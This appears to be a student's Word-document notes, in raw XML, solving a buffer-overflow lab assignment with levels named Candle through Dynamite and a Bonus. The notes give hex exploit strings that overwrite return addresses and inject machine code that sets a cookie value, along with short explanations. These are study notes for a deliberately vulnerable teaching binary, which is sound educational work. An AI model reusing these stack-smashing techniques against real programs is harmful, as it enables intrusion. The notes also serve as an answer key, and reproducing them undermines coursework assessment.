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A8" w:rsidRPr="00796FF8" w:rsidRDefault="00DC2544" w:rsidP="00DC2544">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796FF8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC2544" w:rsidRDefault="00DC2544" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC2544">
        <w:t>0x37a266fd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC2544" w:rsidRDefault="00DC2544" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DC2544" w:rsidRPr="00796FF8" w:rsidRDefault="00DC2544" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796FF8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Candle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC2544" w:rsidRDefault="00DC2544" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC2544">
        <w:t>01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 60 94 04 08</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00097295" w:rsidRDefault="00097295" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Looking at where the exploit string will be supplied by Gets: give us buffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00796FF8" w:rsidRDefault="00A97542" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Buffer of 12, +4 is R/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and +8 is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, so 20 in all.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A97542" w:rsidRDefault="00A97542" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Find address to smoke/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getbuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and then little endian it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0054777E" w:rsidRDefault="0054777E" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0054777E" w:rsidRDefault="0054777E" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00796FF8" w:rsidRPr="00796FF8" w:rsidRDefault="00796FF8" w:rsidP="00796FF8">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796FF8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Sparkler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00796FF8" w:rsidRDefault="00796FF8" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00796FF8">
        <w:t>01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 f0 9</w:t>
      </w:r>
      <w:r w:rsidR="005E1C17">
        <w:t xml:space="preserve">3 04 08 00 00 00 00 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005E1C17">
        <w:t>fd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005E1C17">
        <w:t xml:space="preserve"> 66 a2 37</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C241EB" w:rsidRDefault="00C241EB" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Call fizz and pass cookie as argument, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>val</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> == cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C241EB" w:rsidRDefault="00C241EB" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>We saw that it stores cookie at ebp+8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C241EB" w:rsidRDefault="00426915" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Very similar to candle, but put address of fizz, 4 padding, then cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C241EB" w:rsidRDefault="00C241EB" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DC2544" w:rsidRDefault="00DC2544" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DC2544" w:rsidRPr="00A47CF7" w:rsidRDefault="00DC2544" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A47CF7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Firecracker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC2544" w:rsidRPr="00A47CF7" w:rsidRDefault="00DC2544" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00A47CF7">
        <w:t>01 02 03 04 05 06 07 08 09 10</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00A47CF7">
        <w:t xml:space="preserve"> 11 12 13 14 15 16 d0 b3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A47CF7">
        <w:t>ff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A47CF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A47CF7">
        <w:t>ff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A47CF7">
        <w:t xml:space="preserve"> c7 04 25 fc c0 04 08 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A47CF7">
        <w:t>fd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A47CF7">
        <w:t xml:space="preserve"> 66 a2 37 68 80 93 04 08 c3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6924" w:rsidRPr="00A47CF7" w:rsidRDefault="000E6924" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00A47CF7">
        <w:t>Global value == cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC2544" w:rsidRPr="00A47CF7" w:rsidRDefault="006C26FB" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00A47CF7">
        <w:t>Exploit</w:t>
      </w:r>
      <w:r w:rsidR="00CF0FAA" w:rsidRPr="00A47CF7">
        <w:t xml:space="preserve"> code</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47CF7">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="005B2E75" w:rsidRPr="00A47CF7">
        <w:t>Move cookie to global variable, push address of bang and then ret</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6924" w:rsidRDefault="00D33495" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00A47CF7">
        <w:t xml:space="preserve">Padding to get to buffer, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A47CF7">
        <w:t>then</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A47CF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E6924" w:rsidRPr="00A47CF7">
        <w:t>Return address</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47CF7">
        <w:t xml:space="preserve"> of beginning of exploit, then exploit </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC1559" w:rsidRDefault="00EC1559" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We also need to change </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00BD7144" w:rsidRPr="00A47CF7" w:rsidRDefault="00BD7144" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Return of exploit is + 20 of what we got out of x/20x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00D33495" w:rsidRPr="00A47CF7" w:rsidRDefault="00D33495" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B2E75" w:rsidRPr="00A47CF7" w:rsidRDefault="005B2E75" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DC2544" w:rsidRPr="00796FF8" w:rsidRDefault="00DC2544" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796FF8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Dynamite</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC2544" w:rsidRPr="00796FF8" w:rsidRDefault="00DC2544" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00796FF8">
        <w:t>b8</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00796FF8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796FF8">
        <w:t>fd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796FF8">
        <w:t xml:space="preserve"> 66 a2 37 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796FF8">
        <w:t>bd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796FF8">
        <w:t xml:space="preserve"> f8 b3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796FF8">
        <w:t>ff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796FF8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796FF8">
        <w:t>ff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796FF8">
        <w:t xml:space="preserve"> 68 4c 95 04 08 c3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796FF8">
        <w:t>bc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796FF8">
        <w:t xml:space="preserve"> b3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796FF8">
        <w:t>ff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796FF8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796FF8">
        <w:t>ff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00A47CF7" w:rsidRDefault="00024F41" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>similar</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Firecracker in that you need to push machine instructions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5778" w:rsidRDefault="005F5778" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> cookie to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, restore old </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, push next instruction in test then return</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706950" w:rsidRDefault="00706950" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> took up 16 perfectly, so we just return exploit address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D2CF2" w:rsidRDefault="004D2CF2" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D2CF2" w:rsidRPr="004D2CF2" w:rsidRDefault="004D2CF2" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D2CF2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Bonus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D2CF2" w:rsidRDefault="004D2CF2" w:rsidP="00DC2544">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Move cookie to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, move </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, relationship between </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and old </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>epb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, move </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, push return address, ret</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004D2CF2" w:rsidSect="00DC25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00"/>
    <w:rsid w:val="00024F41"/>
    <w:rsid w:val="00097295"/>
    <w:rsid w:val="000E6924"/>
    <w:rsid w:val="00251471"/>
    <w:rsid w:val="002C3100"/>
    <w:rsid w:val="00426915"/>
    <w:rsid w:val="004D2CF2"/>
    <w:rsid w:val="0054777E"/>
    <w:rsid w:val="005B2E75"/>
    <w:rsid w:val="005B5AA8"/>
    <w:rsid w:val="005E1C17"/>
    <w:rsid w:val="005F5778"/>
    <w:rsid w:val="006C26FB"/>
    <w:rsid w:val="00706950"/>
    <w:rsid w:val="00776FF5"/>
    <w:rsid w:val="00796FF8"/>
    <w:rsid w:val="00A47CF7"/>
    <w:rsid w:val="00A97542"/>
    <w:rsid w:val="00BD7144"/>
    <w:rsid w:val="00C241EB"/>
    <w:rsid w:val="00CF0FAA"/>
    <w:rsid w:val="00D33495"/>
    <w:rsid w:val="00DC2544"/>
    <w:rsid w:val="00EC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C254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C25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4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C254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C25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C51A-CD33-4F80-BF28-A6585070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</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-11-05T06:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-11-05T17:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>